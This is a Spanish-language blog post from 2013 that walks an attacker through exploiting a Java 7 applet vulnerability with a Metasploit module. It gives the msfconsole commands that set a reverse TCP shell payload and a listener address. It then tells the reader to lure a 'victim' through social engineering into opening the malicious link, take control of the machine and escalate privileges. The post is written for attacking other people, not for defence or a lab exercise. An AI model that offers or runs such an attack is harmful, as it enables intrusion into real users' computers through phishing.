miércoles, 23 de enero de 2013

Exploiting Java Applet AverageRangeStatisticImpl Remote Code Execution.


Hoy 23 de Enero, Oracle nuevamente es blanco de los "Hackers", pues se ha publicado una nueva vulnerabilidad que afectan a las versiones de Java 7u7-10 y anteriores, permitiendo a un atacante ejecutar código remoto en el sistema de la victima (Windows - Linux - MAC), para ello el equipo de Metasploit ha desarrollado un modulo denominado java_jre17_glassfish_averagerangestatisticimpl que facilita el trabajo a un atacante en el proceso de explotacion de esta nueva vulnerabilidad.


El respectivo modulo se puede obtener con tal solo ejecutar el comando msfupdate y los pasos para aprovecharse de esta vulnerabilidad, son los siguientes:

REQUERIMIENTOS:

BackTrack 5 R1 - R2 o R3 (Atacante)
Metasploit Framework (Atacante)
Windows XP - 7 - 8 (Victima)
Java 7 Update 10 (Victima)


PROCEDIMIENTOS:
En la terminal/consola tecleamos msfconsole y seguidamente ejecutamos los siguientes comandos:

Bonus - código descifrado desde Rusia con amor:


use exploit/multi/browser/java_jre17_glassfish_averagerangestatisticimpl
set payload java/shell_reverse_tcp
set LHOST 192.168.1.33
set URIPATH /
exploit




Como ya es de conocimiento, tenemos que ejecutar estos comandos para poder generar una URL que contendrá los archivos maliciosos que se ejecutaran en el navegador de la victima, como también generar la conexión entre el ordenador de la victima y la nuestra.

Después de realizar dicho paso, es necesario enviar el LINK malicioso, ya sea con nuestra IP o cualquier otro Fake y usar la Ing. Social para que la victima pueda abrir desde su navegador nuestro LINK. Dicho link enviara 2 archivos en formato .jar y otro que es un simple icono.


Si los archivos que Metasploit ha enviado se ejecutan de una forma exitosa, esta automáticamente generara una conexión reversa entre el ordenador de la victima y la nuestra, permitiendonos ejecutar cualquier tipo de comandos para aprovecharnos del sistema vulnerado y tratar de escalar privilegios siempre y cuando sea de nuestro interés.


El exploit y ataque se realizo contra un Sistema Operativo Windows 7 con la versión de Java 1.7.0_07-b10.

Saludos.

(Fuente | Calebbucker)



No hay comentarios:

Publicar un comentario